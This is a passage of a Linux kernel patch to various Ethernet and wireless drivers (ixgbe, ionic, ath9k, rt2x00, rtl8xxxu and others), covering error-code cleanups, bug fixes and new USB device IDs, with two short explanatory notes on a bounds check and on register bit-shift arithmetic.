++ *  else returns -EBUSY when encountering an error acquiring
++ *  the semaphore, -EIO when the command fails, or -EINVAL when
++ *  incorrect params are passed.
+  **/
+ static s32 ixgbe_set_fw_drv_ver_x550(struct ixgbe_hw *hw, u8 maj, u8 min,
+ 				     u8 build, u8 sub, u16 len,
+@@ -2825,7 +2830,7 @@ static s32 ixgbe_set_fw_drv_ver_x550(struct ixgbe_hw *hw, u8 maj, u8 min,
+ 	int i;
+ 
+ 	if (!len || !driver_ver || (len > sizeof(fw_cmd.driver_string)))
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 
+ 	fw_cmd.hdr.cmd = FW_CEM_CMD_DRIVER_INFO;
+ 	fw_cmd.hdr.buf_len = FW_CEM_CMD_DRIVER_INFO_LEN + len;
+@@ -2850,7 +2855,7 @@ static s32 ixgbe_set_fw_drv_ver_x550(struct ixgbe_hw *hw, u8 maj, u8 min,
+ 
+ 		if (fw_cmd.hdr.cmd_or_resp.ret_status !=
+ 		    FW_CEM_RESP_STATUS_SUCCESS)
+-			return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++			return -EIO;
+ 		return 0;
+ 	}
+ 
+@@ -2907,7 +2912,7 @@ static s32 ixgbe_setup_fc_x550em(struct ixgbe_hw *hw)
+ 	/* Validate the requested mode */
+ 	if (hw->fc.strict_ieee && hw->fc.requested_mode == ixgbe_fc_rx_pause) {
+ 		hw_err(hw, "ixgbe_fc_rx_pause not valid in strict IEEE mode\n");
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 	}
+ 
+ 	/* 10gig parts do not have a word in the EEPROM to determine the
+@@ -2942,7 +2947,7 @@ static s32 ixgbe_setup_fc_x550em(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		hw_err(hw, "Flow control param set incorrectly\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	switch (hw->device_id) {
+@@ -2986,8 +2991,8 @@ static s32 ixgbe_setup_fc_x550em(struct ixgbe_hw *hw)
+ static void ixgbe_fc_autoneg_backplane_x550em_a(struct ixgbe_hw *hw)
+ {
+ 	u32 link_s1, lp_an_page_low, an_cntl_1;
+-	s32 status = IXGBE_ERR_FC_NOT_NEGOTIATED;
+ 	ixgbe_link_speed speed;
++	s32 status = -EIO;
+ 	bool link_up;
+ 
+ 	/* AN should have completed when the cable was plugged in.
+@@ -3013,7 +3018,7 @@ static void ixgbe_fc_autoneg_backplane_x550em_a(struct ixgbe_hw *hw)
+ 
+ 	if (status || (link_s1 & IXGBE_KRM_LINK_S1_MAC_AN_COMPLETE) == 0) {
+ 		hw_dbg(hw, "Auto-Negotiation did not complete\n");
+-		status = IXGBE_ERR_FC_NOT_NEGOTIATED;
++		status = -EIO;
+ 		goto out;
+ 	}
+ 
+@@ -3187,21 +3192,23 @@ static s32 ixgbe_reset_phy_fw(struct ixgbe_hw *hw)
+ /**
+  * ixgbe_check_overtemp_fw - Check firmware-controlled PHYs for overtemp
+  * @hw: pointer to hardware structure
++ *
++ * Return true when an overtemp event is detected, otherwise false.
+  */
+-static s32 ixgbe_check_overtemp_fw(struct ixgbe_hw *hw)
++static bool ixgbe_check_overtemp_fw(struct ixgbe_hw *hw)
+ {
+ 	u32 store[FW_PHY_ACT_DATA_COUNT] = { 0 };
+ 	s32 rc;
+ 
+ 	rc = ixgbe_fw_phy_activity(hw, FW_PHY_ACT_GET_LINK_INFO, &store);
+ 	if (rc)
+-		return rc;
++		return false;
+ 
+ 	if (store[0] & FW_PHY_ACT_GET_LINK_INFO_TEMP) {
+ 		ixgbe_shutdown_fw_phy(hw);
+-		return IXGBE_ERR_OVERTEMP;
++		return true;
+ 	}
+-	return 0;
++	return false;
+ }
+ 
+ /**
+@@ -3251,8 +3258,7 @@ static s32 ixgbe_init_phy_ops_X550em(struct ixgbe_hw *hw)
+ 
+ 	/* Identify the PHY or SFP module */
+ 	ret_val = phy->ops.identify(hw);
+-	if (ret_val == IXGBE_ERR_SFP_NOT_SUPPORTED ||
+-	    ret_val == IXGBE_ERR_PHY_ADDR_INVALID)
++	if (ret_val == -EOPNOTSUPP || ret_val == -EFAULT)
+ 		return ret_val;
+ 
+ 	/* Setup function pointers based on detected hardware */
+@@ -3460,8 +3466,7 @@ static s32 ixgbe_reset_hw_X550em(struct ixgbe_hw *hw)
+ 
+ 	/* PHY ops must be identified and initialized prior to reset */
+ 	status = hw->phy.ops.init(hw);
+-	if (status == IXGBE_ERR_SFP_NOT_SUPPORTED ||
+-	    status == IXGBE_ERR_PHY_ADDR_INVALID)
++	if (status == -EOPNOTSUPP || status == -EFAULT)
+ 		return status;
+ 
+ 	/* start the external PHY */
+@@ -3477,7 +3482,7 @@ static s32 ixgbe_reset_hw_X550em(struct ixgbe_hw *hw)
+ 		hw->phy.sfp_setup_needed = false;
+ 	}
+ 
+-	if (status == IXGBE_ERR_SFP_NOT_SUPPORTED)
++	if (status == -EOPNOTSUPP)
+ 		return status;
+ 
+ 	/* Reset PHY */
+@@ -3501,7 +3506,7 @@ mac_reset_top:
+ 	status = hw->mac.ops.acquire_swfw_sync(hw, swfw_mask);
+ 	if (status) {
+ 		hw_dbg(hw, "semaphore failed with %d", status);
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	}
+ 
+ 	ctrl |= IXGBE_READ_REG(hw, IXGBE_CTRL);
+@@ -3519,7 +3524,7 @@ mac_reset_top:
+ 	}
+ 
+ 	if (ctrl & IXGBE_CTRL_RST_MASK) {
+-		status = IXGBE_ERR_RESET_FAILED;
++		status = -EIO;
+ 		hw_dbg(hw, "Reset polling failed to complete.\n");
+ 	}
+ 
+@@ -3615,7 +3620,7 @@ static s32 ixgbe_setup_fc_backplane_x550em_a(struct ixgbe_hw *hw)
+ 	/* Validate the requested mode */
+ 	if (hw->fc.strict_ieee && hw->fc.requested_mode == ixgbe_fc_rx_pause) {
+ 		hw_err(hw, "ixgbe_fc_rx_pause not valid in strict IEEE mode\n");
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 	}
+ 
+ 	if (hw->fc.requested_mode == ixgbe_fc_default)
+@@ -3672,7 +3677,7 @@ static s32 ixgbe_setup_fc_backplane_x550em_a(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		hw_err(hw, "Flow control param set incorrectly\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	status = hw->mac.ops.write_iosf_sb_reg(hw,
+@@ -3768,7 +3773,7 @@ static s32 ixgbe_acquire_swfw_sync_x550em_a(struct ixgbe_hw *hw, u32 mask)
+ 			return 0;
+ 		if (hmask)
+ 			ixgbe_release_swfw_sync_X540(hw, hmask);
+-		if (status != IXGBE_ERR_TOKEN_RETRY)
++		if (status != -EAGAIN)
+ 			return status;
+ 		msleep(FW_PHY_TOKEN_DELAY);
+ 	}
+@@ -3812,7 +3817,7 @@ static s32 ixgbe_read_phy_reg_x550a(struct ixgbe_hw *hw, u32 reg_addr,
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, mask))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = hw->phy.ops.read_reg_mdi(hw, reg_addr, device_type, phy_data);
+ 
+@@ -3838,7 +3843,7 @@ static s32 ixgbe_write_phy_reg_x550a(struct ixgbe_hw *hw, u32 reg_addr,
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, mask))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = ixgbe_write_phy_reg_mdi(hw, reg_addr, device_type, phy_data);
+ 	hw->mac.ops.release_swfw_sync(hw, mask);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 0bcf3e5592806..3784347b6fd88 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -2678,18 +2678,17 @@ int rvu_mbox_handler_npc_mcam_alloc_entry(struct rvu *rvu,
+ 	rsp->entry = NPC_MCAM_ENTRY_INVALID;
+ 	rsp->free_count = 0;
+ 
+-	/* Check if ref_entry is within range */
+-	if (req->priority && req->ref_entry >= mcam->bmap_entries) {
+-		dev_err(rvu->dev, "%s: reference entry %d is out of range\n",
+-			__func__, req->ref_entry);
+-		return NPC_MCAM_INVALID_REQ;
+-	}
++	/* If ref_entry is greater than the range,
++	 * clamp it to the max value.
++	 */
++	if (req->ref_entry > mcam->bmap_entries)
++		req->ref_entry = mcam->bmap_entries;
+ 
+ 	/* ref_entry can't be '0' if requested priority is high.
+ 	 * Can't be last entry if requested priority is low.
+ 	 */
+ 	if ((!req->ref_entry && req->priority == NPC_MCAM_HIGHER_PRIO) ||
+-	    ((req->ref_entry == (mcam->bmap_entries - 1)) &&
++	    ((req->ref_entry == mcam->bmap_entries) &&
+ 	     req->priority == NPC_MCAM_LOWER_PRIO))
+ 		return NPC_MCAM_INVALID_REQ;
+ 
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_port.c b/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
+index 0050fcb988b75..8cc5172833a91 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
+@@ -168,9 +168,10 @@ static void lan966x_port_link_up(struct lan966x_port *port)
+ 	lan966x_taprio_speed_set(port, config->speed);
+ 
+ 	/* Also the GIGA_MODE_ENA(1) needs to be set regardless of the
+-	 * port speed for QSGMII ports.
++	 * port speed for QSGMII or SGMII ports.
+ 	 */
+-	if (phy_interface_num_ports(config->portmode) == 4)
++	if (phy_interface_num_ports(config->portmode) == 4 ||
++	    config->portmode == PHY_INTERFACE_MODE_SGMII)
+ 		mode = DEV_MAC_MODE_CFG_GIGA_MODE_ENA_SET(1);
+ 
+ 	lan_wr(config->duplex | mode,
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_bus_pci.c b/drivers/net/ethernet/pensando/ionic/ionic_bus_pci.c
+index ce436e97324ac..4b9caec6eb9b2 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_bus_pci.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_bus_pci.c
+@@ -380,6 +380,10 @@ static void ionic_remove(struct pci_dev *pdev)
+ 	del_timer_sync(&ionic->watchdog_timer);
+ 
+ 	if (ionic->lif) {
++		/* prevent adminq cmds if FW is already known to be down */
++		if (test_and_clear_bit(IONIC_LIF_F_FW_RESET, ionic->lif->state))
++			set_bit(IONIC_LIF_F_FW_STOPPING, ionic->lif->state);
++
+ 		ionic_lif_unregister(ionic->lif);
+ 		ionic_devlink_unregister(ionic);
+ 		ionic_lif_deinit(ionic->lif);
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.c b/drivers/net/ethernet/pensando/ionic/ionic_dev.c
+index 344a3924627d4..7adfcd7c2f3ad 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.c
+@@ -293,6 +293,7 @@ void ionic_dev_cmd_comp(struct ionic_dev *idev, union ionic_dev_cmd_comp *comp)
+ 
+ void ionic_dev_cmd_go(struct ionic_dev *idev, union ionic_dev_cmd *cmd)
+ {
++	idev->opcode = cmd->cmd.opcode;
+ 	memcpy_toio(&idev->dev_cmd_regs->cmd, cmd, sizeof(*cmd));
+ 	iowrite32(0, &idev->dev_cmd_regs->done);
+ 	iowrite32(1, &idev->dev_cmd_regs->doorbell);
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.h b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+index 13dfcf9f75dad..c10da629ef6ee 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.h
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+@@ -150,6 +150,7 @@ struct ionic_dev {
+ 	bool fw_hb_ready;
+ 	bool fw_status_ready;
+ 	u8 fw_generation;
++	u8 opcode;
+ 
+ 	u64 __iomem *db_pages;
+ 	dma_addr_t phy_db_pages;
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index f7634884c7508..fcc3faecb0600 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -3008,6 +3008,9 @@ static void ionic_lif_reset(struct ionic_lif *lif)
+ {
+ 	struct ionic_dev *idev = &lif->ionic->idev;
+ 
++	if (!ionic_is_fw_running(idev))
++		return;
++
+ 	mutex_lock(&lif->ionic->dev_cmd_lock);
+ 	ionic_dev_cmd_lif_reset(idev, lif->index);
+ 	ionic_dev_cmd_wait(lif->ionic, DEVCMD_TIMEOUT);
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_main.c b/drivers/net/ethernet/pensando/ionic/ionic_main.c
+index 79272f5f380c6..d2038ff316ca5 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_main.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_main.c
+@@ -410,22 +410,28 @@ int ionic_adminq_wait(struct ionic_lif *lif, struct ionic_admin_ctx *ctx,
+ 				      do_msg);
+ }
+ 
+-int ionic_adminq_post_wait(struct ionic_lif *lif, struct ionic_admin_ctx *ctx)
++static int __ionic_adminq_post_wait(struct ionic_lif *lif,
++				    struct ionic_admin_ctx *ctx,
++				    const bool do_msg)
+ {
+ 	int err;
+ 
++	if (!ionic_is_fw_running(&lif->ionic->idev))
++		return 0;
++
+ 	err = ionic_adminq_post(lif, ctx);
+ 
+-	return ionic_adminq_wait(lif, ctx, err, true);
++	return ionic_adminq_wait(lif, ctx, err, do_msg);
+ }
+ 
+-int ionic_adminq_post_wait_nomsg(struct ionic_lif *lif, struct ionic_admin_ctx *ctx)
++int ionic_adminq_post_wait(struct ionic_lif *lif, struct ionic_admin_ctx *ctx)
+ {
+-	int err;
+-
+-	err = ionic_adminq_post(lif, ctx);
++	return __ionic_adminq_post_wait(lif, ctx, true);
++}
+ 
+-	return ionic_adminq_wait(lif, ctx, err, false);
++int ionic_adminq_post_wait_nomsg(struct ionic_lif *lif, struct ionic_admin_ctx *ctx)
++{
++	return __ionic_adminq_post_wait(lif, ctx, false);
+ }
+ 
+ static void ionic_dev_cmd_clean(struct ionic *ionic)
+@@ -465,7 +471,7 @@ static int __ionic_dev_cmd_wait(struct ionic *ionic, unsigned long max_seconds,
+ 	 */
+ 	max_wait = jiffies + (max_seconds * HZ);
+ try_again:
+-	opcode = readb(&idev->dev_cmd_regs->cmd.cmd.opcode);
++	opcode = idev->opcode;
+ 	start_time = jiffies;
+ 	for (fw_up = ionic_is_fw_running(idev);
+ 	     !done && fw_up && time_before(jiffies, max_wait);
+diff --git a/drivers/net/phy/at803x.c b/drivers/net/phy/at803x.c
+index edd4b1e58d965..75868e63b81bb 100644
+--- a/drivers/net/phy/at803x.c
++++ b/drivers/net/phy/at803x.c
+@@ -2051,7 +2051,7 @@ static struct phy_driver at803x_driver[] = {
+ 	.write_page		= at803x_write_page,
+ 	.get_features		= at803x_get_features,
+ 	.read_status		= at803x_read_status,
+-	.config_intr		= &at803x_config_intr,
++	.config_intr		= at803x_config_intr,
+ 	.handle_interrupt	= at803x_handle_interrupt,
+ 	.get_tunable		= at803x_get_tunable,
+ 	.set_tunable		= at803x_set_tunable,
+@@ -2081,7 +2081,7 @@ static struct phy_driver at803x_driver[] = {
+ 	.resume			= at803x_resume,
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	/* PHY_BASIC_FEATURES */
+-	.config_intr		= &at803x_config_intr,
++	.config_intr		= at803x_config_intr,
+ 	.handle_interrupt	= at803x_handle_interrupt,
+ 	.cable_test_start	= at803x_cable_test_start,
+ 	.cable_test_get_status	= at803x_cable_test_get_status,
+@@ -2097,7 +2097,7 @@ static struct phy_driver at803x_driver[] = {
+ 	.resume			= at803x_resume,
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	/* PHY_BASIC_FEATURES */
+-	.config_intr		= &at803x_config_intr,
++	.config_intr		= at803x_config_intr,
+ 	.handle_interrupt	= at803x_handle_interrupt,
+ 	.cable_test_start	= at803x_cable_test_start,
+ 	.cable_test_get_status	= at803x_cable_test_get_status,
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 5a1bf42ce1566..d837c18874161 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -1315,8 +1315,6 @@ static int ax88179_bind(struct usbnet *dev, struct usb_interface *intf)
+ 
+ 	netif_set_tso_max_size(dev->net, 16384);
+ 
+-	ax88179_reset(dev);
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 21d3461fb5d1c..45f1a871b7da8 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -3474,10 +3474,11 @@ static int virtnet_find_vqs(struct virtnet_info *vi)
+ {
+ 	vq_callback_t **callbacks;
+ 	struct virtqueue **vqs;
+-	int ret = -ENOMEM;
+-	int i, total_vqs;
+ 	const char **names;
++	int ret = -ENOMEM;
++	int total_vqs;
+ 	bool *ctx;
++	u16 i;
+ 
+ 	/* We expect 1 RX virtqueue followed by 1 TX virtqueue, followed by
+ 	 * possible N-1 RX/TX queue pairs used in multiqueue mode, followed by
+@@ -3514,8 +3515,8 @@ static int virtnet_find_vqs(struct virtnet_info *vi)
+ 	for (i = 0; i < vi->max_queue_pairs; i++) {
+ 		callbacks[rxq2vq(i)] = skb_recv_done;
+ 		callbacks[txq2vq(i)] = skb_xmit_done;
+-		sprintf(vi->rq[i].name, "input.%d", i);
+-		sprintf(vi->sq[i].name, "output.%d", i);
++		sprintf(vi->rq[i].name, "input.%u", i);
++		sprintf(vi->sq[i].name, "output.%u", i);
+ 		names[rxq2vq(i)] = vi->rq[i].name;
+ 		names[txq2vq(i)] = vi->sq[i].name;
+ 		if (ctx)
+diff --git a/drivers/net/wireless/ath/ath11k/pcic.c b/drivers/net/wireless/ath/ath11k/pcic.c
+index 380f9d37b6449..e3b65efcc8684 100644
+--- a/drivers/net/wireless/ath/ath11k/pcic.c
++++ b/drivers/net/wireless/ath/ath11k/pcic.c
+@@ -453,8 +453,6 @@ void ath11k_pcic_ext_irq_enable(struct ath11k_base *ab)
+ {
+ 	int i;
+ 
+-	set_bit(ATH11K_FLAG_EXT_IRQ_ENABLED, &ab->dev_flags);
+-
+ 	for (i = 0; i < ATH11K_EXT_IRQ_GRP_NUM_MAX; i++) {
+ 		struct ath11k_ext_irq_grp *irq_grp = &ab->ext_irq_grp[i];
+ 
+@@ -465,6 +463,8 @@ void ath11k_pcic_ext_irq_enable(struct ath11k_base *ab)
+ 		}
+ 		ath11k_pcic_ext_grp_enable(irq_grp);
+ 	}
++
++	set_bit(ATH11K_FLAG_EXT_IRQ_ENABLED, &ab->dev_flags);
+ }
+ EXPORT_SYMBOL(ath11k_pcic_ext_irq_enable);
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c b/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
+index 672789e3c55d0..d6a3f001dacb9 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
+@@ -652,9 +652,10 @@ void ath9k_htc_txstatus(struct ath9k_htc_priv *priv, void *wmi_event)
+ 	struct ath9k_htc_tx_event *tx_pend;
+ 	int i;
+ 
+-	for (i = 0; i < txs->cnt; i++) {
+-		WARN_ON(txs->cnt > HTC_MAX_TX_STATUS);
++	if (WARN_ON_ONCE(txs->cnt > HTC_MAX_TX_STATUS))
++		return;
+ 
++	for (i = 0; i < txs->cnt; i++) {
+ 		__txs = &txs->txstatus[i];
+ 
+ 		skb = ath9k_htc_tx_get_packet(priv, __txs);
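
[Note on the ath9k_htc hunk: a firmware-controlled element count is now validated against the array bound once, before the loop, instead of WARNing inside each iteration after an out-of-bounds access may already have happened. A self-contained sketch of the same pattern (names invented):

    #include <stdio.h>

    #define MAX_STATUS 12

    struct status { int id; };

    /* Reject an over-large count up front; checking inside the loop
     * leaves a window where entries past the array end get read. */
    static int handle_statuses(const struct status *st, unsigned int cnt)
    {
            if (cnt > MAX_STATUS)
                    return -1;              /* malformed event, drop it */
            for (unsigned int i = 0; i < cnt; i++)
                    printf("status %d\n", st[i].id);
            return 0;
    }
]
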
+diff --git a/drivers/net/wireless/ralink/rt2x00/rt2800lib.c b/drivers/net/wireless/ralink/rt2x00/rt2800lib.c
+index 12b700c7b9c3b..517d9023aae3d 100644
+--- a/drivers/net/wireless/ralink/rt2x00/rt2800lib.c
++++ b/drivers/net/wireless/ralink/rt2x00/rt2800lib.c
+@@ -8672,7 +8672,7 @@ static void rt2800_rxdcoc_calibration(struct rt2x00_dev *rt2x00dev)
+ 	rt2800_rfcsr_write_bank(rt2x00dev, 5, 4, saverfb5r4);
+ 	rt2800_rfcsr_write_bank(rt2x00dev, 7, 4, saverfb7r4);
+ 
+-	rt2800_bbp_write(rt2x00dev, 158, 141);
++	rt2800_bbp_write(rt2x00dev, 158, 140);
+ 	bbpreg = rt2800_bbp_read(rt2x00dev, 159);
+ 	bbpreg = bbpreg & (~0x40);
+ 	rt2800_bbp_write(rt2x00dev, 159, bbpreg);
+diff --git a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+index 9a9cfd0ce402d..00b945053e199 100644
+--- a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
++++ b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+@@ -101,6 +101,7 @@ void rt2x00lib_disable_radio(struct rt2x00_dev *rt2x00dev)
+ 	rt2x00link_stop_tuner(rt2x00dev);
+ 	rt2x00queue_stop_queues(rt2x00dev);
+ 	rt2x00queue_flush_queues(rt2x00dev, true);
++	rt2x00queue_stop_queue(rt2x00dev->bcn);
+ 
+ 	/*
+ 	 * Disable radio.
+@@ -1286,6 +1287,7 @@ int rt2x00lib_start(struct rt2x00_dev *rt2x00dev)
+ 	rt2x00dev->intf_ap_count = 0;
+ 	rt2x00dev->intf_sta_count = 0;
+ 	rt2x00dev->intf_associated = 0;
++	rt2x00dev->intf_beaconing = 0;
+ 
+ 	/* Enable the radio */
+ 	retval = rt2x00lib_enable_radio(rt2x00dev);
+@@ -1312,6 +1314,7 @@ void rt2x00lib_stop(struct rt2x00_dev *rt2x00dev)
+ 	rt2x00dev->intf_ap_count = 0;
+ 	rt2x00dev->intf_sta_count = 0;
+ 	rt2x00dev->intf_associated = 0;
++	rt2x00dev->intf_beaconing = 0;
+ }
+ 
+ static inline void rt2x00lib_set_if_combinations(struct rt2x00_dev *rt2x00dev)
+diff --git a/drivers/net/wireless/ralink/rt2x00/rt2x00mac.c b/drivers/net/wireless/ralink/rt2x00/rt2x00mac.c
+index 4202c65177839..75fda72c14ca9 100644
+--- a/drivers/net/wireless/ralink/rt2x00/rt2x00mac.c
++++ b/drivers/net/wireless/ralink/rt2x00/rt2x00mac.c
+@@ -598,6 +598,17 @@ void rt2x00mac_bss_info_changed(struct ieee80211_hw *hw,
+ 	 */
+ 	if (changes & BSS_CHANGED_BEACON_ENABLED) {
+ 		mutex_lock(&intf->beacon_skb_mutex);
++
++		/*
++		 * Clear the 'enable_beacon' flag and clear beacon because
++		 * the beacon queue has been stopped after hardware reset.
++		 */
++		if (test_bit(DEVICE_STATE_RESET, &rt2x00dev->flags) &&
++		    intf->enable_beacon) {
++			intf->enable_beacon = false;
++			rt2x00queue_clear_beacon(rt2x00dev, vif);
++		}
++
+ 		if (!bss_conf->enable_beacon && intf->enable_beacon) {
+ 			rt2x00dev->intf_beaconing--;
+ 			intf->enable_beacon = false;
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index 3a9fa3ff37acc..6dd5ec1e4d8c3 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -7030,6 +7030,18 @@ static const struct usb_device_id dev_table[] = {
+ 	.driver_info = (unsigned long)&rtl8192eu_fops},
+ {USB_DEVICE_AND_INTERFACE_INFO(USB_VENDOR_ID_REALTEK, 0x818c, 0xff, 0xff, 0xff),
+ 	.driver_info = (unsigned long)&rtl8192eu_fops},
++/* D-Link DWA-131 rev C1 */
++{USB_DEVICE_AND_INTERFACE_INFO(0x2001, 0x3312, 0xff, 0xff, 0xff),
++	.driver_info = (unsigned long)&rtl8192eu_fops},
++/* TP-Link TL-WN8200ND V2 */
++{USB_DEVICE_AND_INTERFACE_INFO(0x2357, 0x0126, 0xff, 0xff, 0xff),
++	.driver_info = (unsigned long)&rtl8192eu_fops},
++/* Mercusys MW300UM */
++{USB_DEVICE_AND_INTERFACE_INFO(0x2c4e, 0x0100, 0xff, 0xff, 0xff),
++	.driver_info = (unsigned long)&rtl8192eu_fops},
++/* Mercusys MW300UH */
++{USB_DEVICE_AND_INTERFACE_INFO(0x2c4e, 0x0104, 0xff, 0xff, 0xff),
++	.driver_info = (unsigned long)&rtl8192eu_fops},
+ #endif
+ { }
+ };
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/phy.c
+index fe9b407dc2aff..71e29b103da5a 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/phy.c
+@@ -49,7 +49,7 @@ u32 rtl8723e_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 							    rfpath, regaddr);
+ 	}
+ 
+-	bitshift = rtl8723_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -80,7 +80,7 @@ void rtl8723e_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = rtl8723_phy_rf_serial_read(hw,
+ 								    rfpath,
+ 								    regaddr);
+-			bitshift = rtl8723_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+@@ -89,7 +89,7 @@ void rtl8723e_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 		rtl8723_phy_rf_serial_write(hw, rfpath, regaddr, data);
+ 	} else {
+ 		if (bitmask != RFREG_OFFSET_MASK) {
+-			bitshift = rtl8723_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/phy.c
+index 2b9313cb93dbd..094cb36153f5a 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/phy.c
+@@ -41,7 +41,7 @@ u32 rtl8723be_phy_query_rf_reg(struct ieee80211_hw *hw, enum radio_path rfpath,
+ 	spin_lock(&rtlpriv->locks.rf_lock);
+ 
+ 	original_value = rtl8723_phy_rf_serial_read(hw, rfpath, regaddr);
+-	bitshift = rtl8723_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -68,7 +68,7 @@ void rtl8723be_phy_set_rf_reg(struct ieee80211_hw *hw, enum radio_path path,
+ 	if (bitmask != RFREG_OFFSET_MASK) {
+ 			original_value = rtl8723_phy_rf_serial_read(hw, path,
+ 								    regaddr);
+-			bitshift = rtl8723_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data = ((original_value & (~bitmask)) |
+ 				(data << bitshift));
+ 		}
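
[Note on the rtl8723 hunks: both files swap a driver-local helper for the shared calculate_bit_shift(), which returns the position of the lowest set bit in a register mask. That shift is what turns a masked read-modify-write into a field update: new = (old & ~mask) | (value << shift). A standalone sketch of the arithmetic:

    #include <stdio.h>
    #include <stdint.h>

    /* Position of the lowest set bit, e.g. 0x0070 -> 4. */
    static unsigned int bit_shift(uint32_t mask)
    {
            unsigned int shift = 0;

            while (mask && !(mask & 1)) {
                    mask >>= 1;
                    shift++;
            }
            return shift;
    }

    int main(void)
    {
            uint32_t reg = 0x12345678, mask = 0x0000ff00, val = 0xab;
            unsigned int shift = bit_shift(mask);

            /* Read-modify-write of the field selected by mask. */
            reg = (reg & ~mask) | (val << shift);
            printf("reg = 0x%08x, field = 0x%x\n", reg, (reg & mask) >> shift);
            return 0;   /* prints reg = 0x1234ab78, field = 0xab */
    }
]
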
+diff --git a/drivers/net/wireless/silabs/wfx/sta.c b/drivers/net/wireless/silabs/wfx/sta.c
+index 626dfb4b7a55d..073e870b26415 100644
+--- a/drivers/net/wireless/silabs/wfx/sta.c
++++ b/drivers/net/wireless/silabs/wfx/sta.c
+@@ -354,29 +354,38 @@ static int wfx_upload_ap_templates(struct wfx_vif *wvif)
